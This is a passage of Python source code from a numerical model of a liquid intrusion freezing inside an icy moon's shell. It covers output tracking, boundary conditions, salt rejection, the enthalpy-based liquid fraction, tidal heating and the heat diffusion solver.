hit a\n\t\t\t\t\twall time) without desired\n\t\t\t\tall : bool\n\t\t\t\t\tturns on all outputs listed below\n\t\t\t\tT, phi, k, S, Q : bool\n\t\t\t\t\ttracks and returns an array of temperature, liquid fraction, volume averaged thermal conductivity,\n\t\t\t\t\tsalinity, and source/sink grids, respectively\n\t\t\t\th : bool\n\t\t\t\t\ttracks the height (thickness) of the liquid intrusion over time into a 1d array\n\t\t\t\tr : bool\n\t\t\t\t\ttracks the radius of the liquid portion over time into a 1d array\n\t\t\t\tfreeze_fronts : bool\n\t\t\t\t\ttracks the propagating freeze front at the top and bottom of the intrusion into a 1d array\n\t\t\t\tpercent_frozen : bool\n\t\t\t\t\ttracks and returns a 1d list of the percent of the original intrusion that is now ice\n\t\t\tUsage:\n\t\t\t\tOutput all options every 50 years\n\t\t\t\t\tmodel.outputs.choose(model, all=True, output_frequency=int(50 * model.constants.styr/model.dt))\n\n\t\t\t\tOutput only temperature grids and salinity at every time step\n\t\t\t\t\tmodel.outputs.choose(model, T=True, S=True, output_frequency=1)\n\t\t\t\t\t--or--\n\t\t\t\t\tmodel.outputs.choose(model, output_list=['T','S'], output_frequency=1);\n\t\t\t\"\"\"\n\t\t\tto_output = {'time': True, 'T': T, 'phi': phi, 'k': k, 'S': S, 'Q': Q, 'h': h, 'freeze fronts':\n\t\t\t\tfreeze_fronts, 'r': r, 'percent frozen': percent_frozen}\n\t\t\tif all:\n\t\t\t\tto_output = {key: True for key, value in to_output.items()}\n\n\t\t\tif len(output_list) != 0:\n\t\t\t\tto_output = {key: True for key in output_list}\n\t\t\t\tto_output['time'] = True\n\n\t\t\tself.outputs.transient_results = {key: [] for key in to_output if to_output[key] is True}\n\t\t\tself.outputs.outputs = self.outputs.transient_results.copy()\n\t\t\tself.outputs.tmp_data_directory = file_path\n\t\t\tself.outputs.tmp_data_file_name = file_name\n\t\t\tself.outputs.output_frequency = output_frequency\n\t\t\tself.outputs.tmp_data_file_name = 'tmp_data_runID' + ''.join(random.choice(string.digits) for _ in range(4))\n\n\t\tdef calculate_outputs(self, n):\n\t\t\t\"\"\"\n\t\t\tCalculates the output and appends it to the list for chosen outputs. 
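# ---- editor's note (illustrative sketch, not part of the original record) ----
# calculate_outputs() described here measures the intrusion geometry directly from
# the liquid-fraction grid: np.where(phi > 0) gives the indices of liquid cells, and
# the min/max of those indices times the grid spacing give the freeze-front depths,
# thickness 'h', and radius 'r'. The grid below is synthetic, for illustration only.
import numpy as np

dz = dx = 10.0                       # assumed grid spacing, m
phi = np.zeros((10, 10))
phi[3:6, 2:7] = 1.0                  # a small liquid pocket
z_idx, x_idx = np.where(phi > 0)
thickness = (z_idx.max() - z_idx.min()) * dz          # 'h' in the outputs
radius = x_idx.max() * dx                             # 'r' in the outputs
fronts = np.array([z_idx.min(), z_idx.max()]) * dz    # 'freeze fronts'
print(thickness, radius, fronts)
# ---- end editor's note ----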
See outputs.choose() for description\n\t\t\tof values calculated here.\n\t\t\tParameters:\n\t\t\t\tn : integer\n\t\t\t\t\tnth time step during simulation\n\t\t\tReturns:\n\t\t\t\tans : dictionary object\n\t\t\t\t\tdictionary object with chosen outputs as 1d numpy arrays\n\t\t\t\"\"\"\n\t\t\tans = {}\n\t\t\tfor key in self.outputs.outputs:\n\t\t\t\tif key == 'time':\n\t\t\t\t\tans[key] = self.model_time\n\t\t\t\tif key == 'percent frozen':\n\t\t\t\t\tans[key] = 1 - (self.phi[self.geom].sum()) / len(self.geom[1])\n\t\t\t\tif key == 'r':\n\t\t\t\t\ttmp = np.where(self.phi > 0)\n\t\t\t\t\tans[key] = self.dx * max(tmp[1])\n\t\t\t\t\tdel tmp\n\t\t\t\tif key == 'h':\n\t\t\t\t\ttmp = np.where(self.phi > 0)\n\t\t\t\t\tans[key] = (max(tmp[0]) - min(tmp[0])) * self.dz\n\t\t\t\t\tdel tmp\n\t\t\t\tif key == 'freeze fronts':\n\t\t\t\t\ttmp = np.where(self.phi > 0)\n\t\t\t\t\tans[key] = np.array([min(tmp[0]), max(tmp[0])]) * self.dz\n\t\t\t\t\tdel tmp\n\t\t\t\tif key == 'T':\n\t\t\t\t\tans[key] = self.T.copy()\n\t\t\t\tif key == 'S':\n\t\t\t\t\tans[key] = self.S.copy()\n\t\t\t\tif key == 'phi':\n\t\t\t\t\tans[key] = self.phi.copy()\n\t\t\t\tif key == 'k':\n\t\t\t\t\tans[key] = self.k.copy()\n\t\t\t\tif key == 'Q':\n\t\t\t\t\tans[key] = self.Q.copy()\n\t\t\treturn ans\n\n\t\tdef get_results(self, n):\n\t\t\t\"\"\"Calls outputs.calculate_outputs() then saves dictionary of results to file\"\"\"\n\t\t\tif n % self.outputs.output_frequency == 0:\n\t\t\t\tget = self.outputs.calculate_outputs(self, n)\n\t\t\t\tsave_data(get, self.outputs.tmp_data_file_name + '_n={}'.format(n), self.outputs.tmp_data_directory)\n\n\t\tdef get_all_data(self, del_files=True):\n\t\t\t\"\"\"Concatenates all saved outputs from outputs.get_results() and puts into a single dictionary object.\"\"\"\n\t\t\tcwd = os.getcwd() # find working directory\n\t\t\tos.chdir(self.outputs.tmp_data_directory) # change to directory where data is being stored\n\n\t\t\t# make a list of all results files in directory\n\t\t\tdata_list = nat_sort([data for data in os.listdir() if data.endswith('.pkl') and \\\n\t\t\t self.outputs.tmp_data_file_name in data])\n\t\t\t# copy dictionary of desired results\n\t\t\tans = self.outputs.transient_results.copy()\n\t\t\t# iterate over file list\n\t\t\tfor file in data_list:\n\t\t\t\ttmp_dict = load_data(file) # load file\n\t\t\t\tfor key in self.outputs.outputs: # iterate over desired outputs\n\t\t\t\t\tans[key].append(tmp_dict[key]) # add output from result n to final file\n\t\t\t\tdel tmp_dict\n\t\t\t\tif del_files: os.remove(file)\n\n\t\t\t# make everything a numpy array for easier manipulation\n\t\t\tans = {key: np.asarray(value) for key, value in ans.items()}\n\n\t\t\t# go back to working directory\n\t\t\tos.chdir(cwd)\n\t\t\treturn ans\n\n\tdef set_boundaryconditions(self, top=True, bottom=True, sides=True, **kwargs):\n\t\t\"\"\"\n\t\t\tSet boundary conditions for heat solver. 
A bunch of options are available in case they want to be tested\n\t\t\tor used.\n\t\t\ttop : bool, string\n\t\t\t\ttop boundary conditions.\n\t\t\t\tdefault: True = Dirichlet, Ttop = Tsurf chosen earlier\n\t\t\t\t'Flux': surface loses heat to a \"ghost cell\" of ice\n\t\t\t\t\t\ttemperature of ghost cell is based on the equilibrium temperature profile at the depth one\n\t\t\t\t\t\tspatial size \"above\" the domain,\n\t\t\t\t\t\ti.e.: T_(ghost_cell) = Tsurf * (Tbot/Tsurf) ** (-dz/Lz)\n\t\t\t\t\t\t\t\tfor Tsurf = 110 K, Tbot = 273.15, & Lz = 5 km => T_(ghost_cell) = 109.8 K\n\t\t\t\t'Radiative': surface loses heat beyond the \"background\" surface temperature through blackbody\n\t\t\t\t\t\t\tradiation to a vacuum using Stefan-Boltzmann Law.\n\t\t\t\t\t\t\tNote: The smaller the time step the better this will predict the surface warming. Larger\n\t\t\t\t\t\t\ttime steps make the surface gain heat too fast. This is especially important if upper\n\t\t\t\t\t\t\tdomain is cold and simulation is using temperature-dependent thermal conductivity.\n\n\t\t\tbottom: bool, string\n\t\t\t\tbottom boundary condition\n\t\t\t\tdefault, True: Dirichlet, Tbottom = Tbot chosen earlier\n\t\t\t\t'Flux' : bottom loses heat to a \"ghost cell\" of ice at a constant temperature\n\t\t\t\t\t\t temperature of ghost cell is based on equilibrium temperature profile at depth one spatial\n\t\t\t\t\t\t size below the domain\n\t\t\t\t\t\t i.e. T_(ghost_cell) = Tsurf * (Tbot/Tsurf) ** ((Lz+dz)/Lz)\n\t\t\t\t\t\t for Tsurf = 110 K, Tbot = 273.15, & Lz = 5 km => T_(ghost_cell) = 273.647 K\n\t\t\t\t\t\t-> this can be helpful for using a \"cheater\" vertical domain so as not to have to simulate a\n\t\t\t\t\t\twhole shell\n\t\t\t\t'FluxI', 'FluxW': bottom loses heat to a \"ghost cell\" of ice ('FluxI') or water ('FluxW') at a chosen\n\t\t\t\t\t\t\t\tconstant temperature\n\t\t\t\t\t\t\t\tex: model.set_boundaryconditions(bottom='FluxI', botT=260);\n\t\t\tsides: bool, string\n\t\t\t\tLeft and right boundary conditions\n\t\t\t\tTrue : Dirichlet boundary condition;\n\t\t\t\t\t\tTleft = Tright = Tedge (see init_T)\n\t\t\t\t\t\t* NOTE: must set up domain such that anomaly is far enough away to not interact with the\n\t\t\t\t\t\tedges of domain\n\t\t\t\t'NoFlux : a 'no flux' boundary condition\n\t\t\t\t\t\t\t-> boundaries are forced to be the same temperature as the adjacent cells in the domain\n\t\t\t\t'RFlux' : 'NoFlux' boundary condition on the left, with a flux boundary at T(z,x=Lx,t) = Tedge(z)\n\t\t\t\t\t\tthat is dL far away. 
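# ---- editor's note (illustrative sketch, not part of the original record) ----
# The 'Flux' boundary conditions described here evaluate the conductive equilibrium
# profile T(z) = Tsurf * (Tbot/Tsurf)**(z/Lz) one cell outside the domain. With the
# numbers quoted in the docstring (Tsurf=110 K, Tbot=273.15 K, Lz=5 km) and an
# assumed grid spacing dz=10 m, this reproduces the quoted ghost-cell values.
Tsurf, Tbot, Lz, dz = 110.0, 273.15, 5000.0, 10.0
T_ghost_top = Tsurf * (Tbot / Tsurf) ** (-dz / Lz)        # ~109.8 K above the surface
T_ghost_bot = Tsurf * (Tbot / Tsurf) ** ((Lz + dz) / Lz)  # ~273.647 K below the base
print(round(T_ghost_top, 1), round(T_ghost_bot, 3))
# ---- end editor's note ----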
Most useful when using the symmetry about x option.\n\t\t\t\t\t\tdL value must be chosen when using this option:\n\t\t\t\t\t\tex: model.set_boundaryconditions(sides='RFlux', dL=500e3)\n\t\t\"\"\"\n\n\t\tself.topBC = top\n\t\tif top == 'Radiative':\n\t\t\t# self.Std_Flux_in = (self.k_initial[0, 1:-1] + self.k_initial[1, 1:-1]) \\\n\t\t\t# * (self.T_initial[1, 1:-1] - self.T_initial[0,1:-1])\n\t\t\tself.std_set = 0\n\n\t\tself.botBC = bottom\n\t\tif bottom == 'FluxI' or bottom == 'FluxW':\n\t\t\ttry:\n\t\t\t\tself.botT = kwargs['botT']\n\t\t\texcept:\n\t\t\t\traise Exception('Bottom boundary condition temperature not chosen\\n\\t->ex: '\n\t\t\t\t 'model.set_boundaryconditions(bottom=\\'FluxI\\', botT=260);')\n\t\tself.sidesBC = sides\n\t\tif sides == 'RFlux':\n\t\t\ttry:\n\t\t\t\tself.dL = kwargs['dL']\n\t\t\texcept:\n\t\t\t\traise Exception('Length for right side flux not chosen\\n\\t->model.set_boundaryconditions('\n\t\t\t\t 'sides=\\'RFlux\\', dL=500e3)')\n\n\tdef update_salinity(self, phi_last):\n\t\t\"\"\"\n\t\tParameterization of salt advection and diffusion in the intrusion. See Chivers et al., 201X for full\n\t\tdescription of parameterization.\n\t\t\"\"\"\n\t\tif self.issalt:\n\t\t\tz_ni, x_ni = np.where((phi_last > 0) & (self.phi == 0)) # find where ice has just formed\n\t\t\twater = np.where(self.phi >= self.rejection_cutoff) # find cells that can accept rejected salts\n\t\t\tvol = water[1].shape[0] # calculate \"volume\" of water\n\t\t\t# rejected_salt = 0 # initialize amount of salt rejected, ppt\n\t\t\tself.wat_vol.append(self.phi.sum())\n\t\t\tself.removed_salt.append(0) # start catalogue of salt removed from system\n\t\t\tself.mass_removed.append(0)\n\t\t\tself.ppt_removed.append(0)\n\n\t\t\tif len(z_ni) > 0 and vol != 0: # iterate over cells where ice has just formed\n\t\t\t\tSn = self.S.copy()\n\t\t\t\tfor i in range(len(z_ni)):\n\t\t\t\t\t# save starting salinity in cell\n\t\t\t\t\tS_old = self.S[z_ni[i], x_ni[i]]\n\t\t\t\t\t# calculate thermal gradients across each cell\n\t\t\t\t\tif self.symmetric and x_ni[i] in [0, self.nx - 1]:\n\t\t\t\t\t\tdTx = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tdTx = abs(self.T[z_ni[i], x_ni[i] - 1] - self.T[z_ni[i], x_ni[i] + 1]) / (2 * self.dx)\n\t\t\t\t\tdTz = (self.T[z_ni[i] - 1, x_ni[i]] - self.T[z_ni[i] + 1, x_ni[i]]) / (2 * self.dz)\n\n\t\t\t\t\t# brine drainage parameterization:\n\t\t\t\t\t# bottom of intrusion -> no gravity-drainage, salt stays\n\t\t\t\t\tif dTz > 0:\n\t\t\t\t\t\tself.S[z_ni[i], x_ni[i]] = S_old\n\n\t\t\t\t\t# top of intrusion -> brine drains and rejects salt\n\t\t\t\t\telif dTz < 0:\n\t\t\t\t\t\t# dT = np.hypot(dTx, dTz) # gradient across the diagonal of the cell\n\t\t\t\t\t\t# dT = max(abs(dTx), abs(dTz)) # maximum value\n\t\t\t\t\t\t# dT = np.sqrt(dTx*abs(dTz)) # geometric mean\n\t\t\t\t\t\t# dT = 2/(1/dTx + 1/abs(dTz)) # harmonic mean\n\t\t\t\t\t\tdT = (dTx + abs(dTz)) / 2. # arithmetic mean\n\t\t\t\t\t\t# salt entrained in newly formed ice determined by Buffo et al., 2019 results. 
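# ---- editor's note (illustrative sketch, not part of the original record) ----
# The commented-out lines in update_salinity() below try several ways of averaging
# the horizontal and vertical thermal gradients (dTx, dTz) into one scalar. For a
# sample gradient pair the candidates differ noticeably; values are illustrative only.
import numpy as np

dTx, dTz = 0.02, 0.08                   # K/m, made-up magnitudes
print(np.hypot(dTx, dTz))               # diagonal of the cell: ~0.0825
print(max(dTx, dTz))                    # maximum value: 0.08
print(np.sqrt(dTx * dTz))               # geometric mean: 0.04
print(2 / (1 / dTx + 1 / dTz))          # harmonic mean: 0.032
print((dTx + dTz) / 2)                  # arithmetic mean (the one used): 0.05
# ---- end editor's note ----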
(See\n\t\t\t\t\t\t# IceSystem.entrain_salt() function)\n\t\t\t\t\t\tself.S[z_ni[i], x_ni[i]] = self.entrain_salt(dT, S_old, self.composition)\n\t\t\t\t\t\t# not all salt will be entrained in ice, some will be mixed back into\n\t\t\t\t\t# rejected_salt += S_old - self.S[z_ni[i], x_ni[i]]\n\n\t\t\t\t# assume the salt is well mixed into remaining liquid solution in time step dt\n\t\t\t\tself.S[water] = self.S[water] + (Sn.sum() - self.S.sum()) / vol\n\t\t\t\t'''\n\t\t\t\t# attempt at vectorizing the salt parameterization but it ends up being slower (?)\n\t\t\t\t# unless entrain_salt can be rewritten without the for-loop\n\n\t\t\t\tS_old = self.S.copy()\n\t\t\t\tdTz = (self.T[:-2,:] - self.T[2:,:]) / (2 * self.dz)\n\t\t\t\tdTx = abs(self.T[:,:-2] - self.T[:,2:]) / (2 * self.dx)\n\t\t\t\tgrad = (abs(dTx[z_ni, x_ni-1]) + abs(dTz[z_ni-1, x_ni])) / 2\n\t\t\t\tself.S[z_ni, x_ni] = self.entrain_salt(grad, self.S[z_ni, x_ni], self.composition)\n\n\t\t\t\t# do bottom parameterization\n\t\t\t\tnew_dTz = dTz[z_ni-1, x_ni]\n\t\t\t\tloc = np.where(new_dTz > 0)[0]\n\t\t\t\tself.S[z_ni[loc],x_ni[loc]] = S_old[z_ni[loc], x_ni[loc]]\n\n\t\t\t\tself.S[water] = self.S[water] + (S_old.sum() - self.S.sum()) / vol\n\t\t\t\t'''\n\t\t\t\t# remove salt from system if liquid is above the saturation point\n\t\t\t\tself.removed_salt[-1] += (self.S[self.S >= self.saturation_point] - self.saturation_point).sum()\n\t\t\t\tself.mass_removed[-1] += vol * (self.S[self.geom].max() * self.C_rho + self.constants.rho_w) * \\\n\t\t\t\t self.removed_salt[-1] / vol / 1000\n\t\t\t\tself.ppt_removed[-1] += self.removed_salt[-1] / vol\n\n\t\t\t\t# ensure liquid hits only the saturation concentration\n\t\t\t\tself.S[self.S > self.saturation_point] = self.saturation_point\n\n\t\t\t# check mass conservation\n\t\t\ttotal_S_new = self.S.sum() + np.asarray(self.removed_salt).sum()\n\t\t\tif abs(total_S_new - self.total_salt[0]) <= self.Stol:\n\t\t\t\tself.total_salt.append(total_S_new)\n\t\t\telse:\n\t\t\t\tself.total_salt.append(total_S_new)\n\t\t\t\traise Exception('Mass not being conserved')\n\n\t\t\t# outdated usage, may delete at some point\n\t\t\t# however, it can be used to stop simulation after liquid becomes saturated\n\t\t\tif (self.S[water] >= self.saturation_point).all() and water[0].sum() > 0:\n\t\t\t\treturn 1\n\t\t\telse:\n\t\t\t\treturn 0\n\n\tdef update_liquid_fraction(self, phi_last):\n\t\t\"\"\"Application of Huber et al., 2008 enthalpy method. 
Determines volume fraction of liquid/solid in a cell.\"\"\"\n\n\t\t# update melting temperature for enthalpy if salt is included in simulation\n\t\tif self.issalt:\n\t\t\tself.Tm = self.Tm_func(self.S, *self.Tm_consts[self.composition])\n\t\t# calculate new enthalpy of solid ice\n\t\tHs = self.cp_i * self.Tm  # update enthalpy of solid ice\n\t\tH = self.cp_i * self.T + self.constants.Lf * phi_last  # calculate the enthalpy in each cell\n\t\t# update liquid fraction\n\t\tself.phi[H >= Hs] = (H[H >= Hs] - Hs[H >= Hs]) / self.constants.Lf\n\t\tself.phi[H <= Hs + self.constants.Lf] = (H[H <= Hs + self.constants.Lf] - Hs[\n\t\t\tH <= Hs + self.constants.Lf]) / self.constants.Lf\n\t\t# all ice\n\t\tself.phi[H < Hs] = 0.\n\t\t# all water\n\t\tself.phi[H > Hs + self.constants.Lf] = 1\n\n\tdef update_volume_averages(self):\n\t\t\"\"\"Updates volume averaged thermal properties.\"\"\"\n\n\t\tif self.kT:\n\t\t\tself.k = (1 - self.phi) * (self.constants.ac / self.T) + self.phi * self.constants.kw\n\t\telse:\n\t\t\tself.k = (1 - self.phi) * self.constants.ki + self.phi * self.constants.kw\n\n\t\tif self.cpT == \"GM89\":\n\t\t\t\"Use temperature-dependent specific heat for pure ice from Grimm & McSween 1989\"\n\t\t\tself.cp_i = 185. + 7.037 * self.T\n\t\telif self.cpT == \"CG10\":\n\t\t\t\"Use temperature-dependent specific heat for pure ice from Choukroun & Grasset 2010\"\n\t\t\tself.cp_i = 74.11 + 7.56 * self.T\n\t\telse:\n\t\t\tself.cp_i = self.constants.cp_i\n\n\t\tif self.issalt:\n\t\t\tself.rhoc = (1 - self.phi) * (self.constants.rho_i + self.Ci_rho * self.S) * self.cp_i + \\\n\t\t\t            self.phi * (self.constants.rho_w + self.C_rho * self.S) * self.constants.cp_w\n\t\telif not self.issalt:\n\t\t\tself.rhoc = (1 - self.phi) * self.constants.rho_i * self.cp_i + \\\n\t\t\t            self.phi * self.constants.rho_w * self.constants.cp_w\n\n\tdef update_sources_sinks(self, phi_last, T_last):\n\t\t\"\"\"Updates external heat sources and heat sinks during simulation.\"\"\"\n\t\tself.latent_heat = self.constants.rho_i * self.constants.Lf * (self.phi - phi_last) / self.dt\n\n\t\tself.tidal_heat = 0\n\t\tif self.tidalheat:\n\t\t\t# ICE effective viscosity follows an Arrhenius law\n\t\t\t# viscosity = reference viscosity * exp[C/Tm * (Tm/T - 1)]\n\t\t\t# if cell is water, just use reference viscosity for pure ice at 0 K\n\t\t\tself.visc = (1 - phi_last) * self.constants.visc0i \\\n\t\t\t            * np.exp(self.constants.Qs * (self.Tm / T_last - 1) / \\\n\t\t\t                     (self.constants.Rg * self.Tm)) \\\n\t\t\t            + phi_last * self.constants.visc0w\n\t\t\tself.tidal_heat = (self.constants.eps0 ** 2 * self.constants.omega ** 2 * self.visc) / (\n\t\t\t\t\t2 + 2 * self.constants.omega ** 2 * self.visc ** 2 / (self.constants.G ** 2))\n\n\t\treturn self.tidal_heat - self.latent_heat\n\n\tdef apply_boundary_conditions(self, T_last, k_last, rhoc_last):\n\t\t\"\"\"Applies chosen boundary conditions during simulation run.\"\"\"\n\t\t# apply chosen boundary conditions at bottom of domain\n\t\tif self.botBC == True:\n\t\t\tself.T[-1, 1:-1] = self.TbotBC[1:-1]\n\n\t\telif self.botBC == 'Flux':\n\t\t\tT_bot_out = self.Tsurf * (self.Tbot / self.Tsurf) ** ((self.Lz + self.dz) / self.Lz)\n\t\t\tc = self.dt / (2 * rhoc_last[-1, 1:-1])\n\n\t\t\tTbotx = c / self.dx ** 2 * ((k_last[-1, 1:-1] + k_last[-1, 2:]) * (T_last[-1, 2:] - T_last[-1, 1:-1]) \\\n\t\t\t                            - (k_last[-1, 1:-1] + k_last[-1, :-2]) * (T_last[-1, 1:-1] - T_last[-1, :-2]))\n\t\t\tTbotz = c / self.dz ** 2 * (\n\t\t\t\t\t(k_last[-1, 1:-1] + self.constants.ac / T_bot_out) * (T_bot_out - T_last[-1, 1:-1]) 
\\\n\t\t\t\t\t- (k_last[-1, 1:-1] + k_last[-2, 1:-1]) * (T_last[-1, 1:-1] - T_last[-2, 1:-1]))\n\t\t\tself.T[-1, 1:-1] = T_last[-1, 1:-1] + Tbotx + Tbotz + self.Q[-1, 1:-1] * 2 * c\n\n\t\telif self.botBC == 'FluxI' or self.botBC == 'FluxW': # constant temperature ice\n\t\t\tc = self.dt / (2 * rhoc_last[-1, 1:-1])\n\n\t\t\tif self.botBC == 'FluxI':\n\t\t\t\tkbot = self.constants.ac / self.botT\n\t\t\telif self.botBC == 'FluxW':\n\t\t\t\tkbot = self.constants.kw\n\n\t\t\tTbotx = c / self.dx ** 2 * ((k_last[-1, 1:-1] + k_last[-1, 2:]) * (T_last[-1, 2:] - T_last[-1, 1:-1]) \\\n\t\t\t - (k_last[-1, 1:-1] + k_last[-1, :-2]) * (T_last[-1, 1:-1] - T_last[-1, :-2]))\n\t\t\tTbotz = c / self.dz ** 2 * ((k_last[-1, 1:-1] + kbot) * (self.botT - T_last[-1, 1:-1]) \\\n\t\t\t - (k_last[-1, 1:-1] + k_last[-2, 1:-1]) * (T_last[-1, 1:-1] - T_last[-2, 1:-1]))\n\t\t\tself.T[-1, 1:-1] = T_last[-1, 1:-1] + Tbotx + Tbotz + self.Q[-1, 1:-1] * 2 * c\n\n\t\t# apply chosen boundary conditions at top of domain\n\t\tif self.topBC == True:\n\t\t\tself.T[0, 1:-1] = self.TtopBC[1:-1]\n\n\t\telif self.topBC == 'Flux':\n\t\t\tT_top_out = self.Tsurf * (self.Tbot / self.Tsurf) ** (-self.dz / self.Lz)\n\n\t\t\tif self.cpT is True:\n\t\t\t\tCbc = rhoc_last[0, 1:-1] / (self.constants.rho_i * (185. + 2 * 7.037 * T_top_out))\n\t\t\telse:\n\t\t\t\tCbc = 1\n\t\t\tc = self.dt / (2 * rhoc_last[0, 1:-1])\n\t\t\tTtopx = c / self.dx ** 2 * ((k_last[0, 1:-1] + k_last[0, 2:]) * (T_last[0, 2:] - T_last[0, 1:-1]) \\\n\t\t\t - (k_last[0, 1:-1] + k_last[0, :-2]) * (T_last[0, 1:-1] - T_last[0, :-2]))\n\t\t\tTtopz = c / self.dz ** 2 * ((k_last[0, 1:-1] + k_last[1, 1:-1]) * (T_last[1, 1:-1] - T_last[0, 1:-1]) \\\n\t\t\t - (k_last[0, 1:-1] + Cbc * self.constants.ac / T_top_out) * (\n\t\t\t\t\t T_last[0, 1:-1] - T_top_out))\n\t\t\tself.T[0, 1:-1] = T_last[0, 1:-1] + Ttopx + Ttopz + self.Q[0, 1:-1] * 2 * c\n\n\t\telif self.topBC == 'Radiative':\n\t\t\tc = self.dt / (2 * rhoc_last[0, :])\n\t\t\trad = self.dz * self.constants.stfblt * self.constants.emiss * (T_last[0, :] ** 4 - self.Tsurf ** 4)\n\t\t\tTtopz = c / self.dz ** 2 * ((k_last[0, :] + k_last[1, :]) * (T_last[1, :] - T_last[0, :]) \\\n\t\t\t - (self.k_initial[0, :] + self.k_initial[1, :]) * (\n\t\t\t\t\t self.T_initial[1, :] - self.Tsurf))\n\t\t\tTtopx = 1 / self.dx ** 2 * ((k_last[0, 1:-1] + k_last[0, 2:]) * (T_last[0, 2:] - T_last[0, 1:-1]) \\\n\t\t\t - (k_last[0, 1:-1] + k_last[0, :-2]) * (T_last[0, 1:-1] - T_last[0, :-2]))\n\n\t\t\tself.T[0, :] = T_last[0, :] + Ttopz - rad * c / self.dz ** 2\n\t\t\tself.T[0, 1:-1] += (Ttopx + self.Q[0, 1:-1] * 2) * self.dt / (2 * rhoc_last[0, 1:-1])\n\t\t# else:\n\t\t#\tself.T[0, 1:-1] = self.Tsurf\n \n\t\t# apply chosen boundary conditions at sides of domain\n\t\tif self.sidesBC == True:\n\t\t\tself.T[:, 0] = self.Tedge.copy()\n\t\t\tself.T[:, self.nx - 1] = self.Tedge.copy()\n\n\t\telif self.sidesBC == 'NoFlux':\n\t\t\tself.T[:, 0] = self.T[:, 1].copy()\n\t\t\tself.T[:, -1] = self.T[:, -2].copy()\n\n\t\telif self.sidesBC == 'RFlux':\n\t\t\t# left side of domain uses 'NoFlux'\n\t\t\tself.T[:, 0] = T_last[:, 1].copy()\n\n\t\t\t# right side of domain\n\t\t\tc = self.dt / (2 * rhoc_last[1:-1, -1])\n\t\t\tTRX = c * ((k_last[1:-1, -1] + self.constants.ac / self.Tedge[1:-1]) * \\\n\t\t\t (self.Tedge[1:-1] - T_last[1:-1, -1]) / self.dx \\\n\t\t\t - (k_last[1:-1, -1] + k_last[1:-1, -2]) * (T_last[1:-1, -1] - T_last[1:-1, -2]) / self.dL)\n\n\t\t\tTRZ = c * ((k_last[1:-1, -1] + k_last[2:, -1]) * (T_last[2:, -1] - T_last[1:-1, -1]) \\\n\t\t\t - (k_last[1:-1, -1] + 
k_last[:-2, -1]) * (T_last[1:-1, -1] - T_last[:-2, -1])) / self.dz ** 2\n\n\t\t\tself.T[1:-1, -1] = T_last[1:-1, -1] + TRX + TRZ + self.Q[1:-1, -1] * 2 * c\n\n\tdef get_gradients(self, T_last):\n\t\t# constant in front of x-terms\n\t\tCx = self.dt / (2 * self.rhoc[1:-1, 1:-1] * self.dx ** 2)\n\t\t# temperature terms in x direction\n\t\tTx = Cx * ((self.k[1:-1, 1:-1] + self.k[1:-1, 2:]) * (T_last[1:-1, 2:] - T_last[1:-1, 1:-1]) \\\n\t\t - (self.k[1:-1, 1:-1] + self.k[1:-1, :-2]) * (T_last[1:-1, 1:-1] - T_last[1:-1, :-2]))\n\t\t# constant in front of z-terms\n\t\tCz = self.dt / (2 * self.rhoc[1:-1, 1:-1] * self.dz ** 2)\n\t\t# temperature terms in z direction\n\t\tTz = Cz * ((self.k[1:-1, 1:-1] + self.k[2:, 1:-1]) * (T_last[2:, 1:-1] - T_last[1:-1, 1:-1]) \\\n\t\t - (self.k[1:-1, 1:-1] + self.k[:-2, 1:-1]) * (T_last[1:-1, 1:-1] - T_last[:-2, 1:-1]))\n\t\treturn Tx, Tz\n\n\tdef print_all_options(self, nt):\n\t\t\"\"\"Prints options chosen for simulation.\"\"\"\n\n\t\tdef stringIO(bin):\n\t\t\tif bin:\n\t\t\t\treturn 'on'\n\t\t\telse:\n\t\t\t\treturn 'off'\n\n\t\tdef stringBC(BC):\n\t\t\tif isinstance(BC, str):\n\t\t\t\treturn BC\n\t\t\telif BC:\n\t\t\t\treturn 'Dirichlet'\n\t\t\telse:\n\t\t\t\treturn 'off'\n\n\t\tprint('Starting simulation with\\n-------------------------')\n\t\tprint('\\t total model time: {}s, {}yr'.format(nt * self.dt, (nt * self.dt) / self.constants.styr))\n\t\tprint('\\t dt = {} s'.format(self.dt))\n\t\tprint('\\t Ice shell thickness: {} m'.format(self.Lz))\n\t\tprint('\\t Lateral domain size: {} m'.format(self.Lx))\n\t\tprint('\\t dz = {} m; dx = {} m'.format(self.dz, self.dx))\n\t\tprint('\\t surface temperature: {} K'.format(self.Tsurf))\n\t\tprint('\\t bottom temperature: {} K'.format(self.Tbot))\n\t\tprint('\\t boundary conditions:')\n\t\tprint('\\t top: {}'.format(stringBC(self.topBC)))\n\t\tprint('\\t bottom: {}'.format(stringBC(self.botBC)))\n\t\tprint('\\t sides: {}'.format(stringBC(self.sidesBC)))\n\t\tprint('\\t sources/sinks:')\n\t\tprint('\\t tidal heating: {}'.format(stringIO(self.tidalheat)))\n\t\tprint('\\t latent heat: {}'.format(stringIO(self.latentheat)))\n\t\tprint('\\t tolerances:')\n\t\tprint('\\t temperature: {}'.format(self.Ttol))\n\t\tprint('\\t liquid fraction: {}'.format(self.phitol))\n\t\tif self.issalt:\n\t\t\tprint('\\t salinity: {}'.format(self.Stol))\n\t\tprint('\\t thermal properties:')\n\t\tprint('\\t ki(T): {}'.format(stringIO(self.kT)))\n\t\tprint('\\t ci(T): {}'.format(stringIO(self.cpT)))\n\t\tprint('\\t intrusion/salt:')\n\t\ttry:\n\t\t\tself.geom\n\t\t\tprint(f'\\t radius: {self.R_int}m')\n\t\t\tprint(f'\\t thickness: {self.thickness}m')\n\t\t\tprint(f'\\t depth: {self.depth}m')\n\t\texcept AttributeError:\n\t\t\tpass\n\t\tprint('\\t salinity: {}'.format(stringIO(self.issalt)))\n\t\tif self.issalt:\n\t\t\tprint(f'\\t composition: {self.composition}')\n\t\t\tprint(f'\\t concentration: {self.concentration}ppt')\n\t\tprint('\\t other:')\n\t\tprint(f'\\t stop on freeze: {stringIO(self.freezestop)}')\n\t\tprint('-------------------------')\n\t\ttry:\n\t\t\tprint('Requested outputs: {}'.format(list(self.outputs.transient_results.keys())))\n\t\texcept AttributeError:\n\t\t\tprint('no outputs requested')\n\n\n\tdef solve_heat(self, nt, dt, print_opts=True, n0=0):\n\t\t\"\"\"\n\t\tIteratively solve the two-dimensional heat diffusion problem with temperature-dependent conductivity of ice.\n\t\tParameters:\n\t\t\tnt : int\n\t\t\t\tnumber of time steps to take\n\t\t\tdt : float\n\t\t\t\ttime step, s\n\t\t\tprint_opts: bool\n\t\t\t\twhether to call the print_all_options() function above to print all 
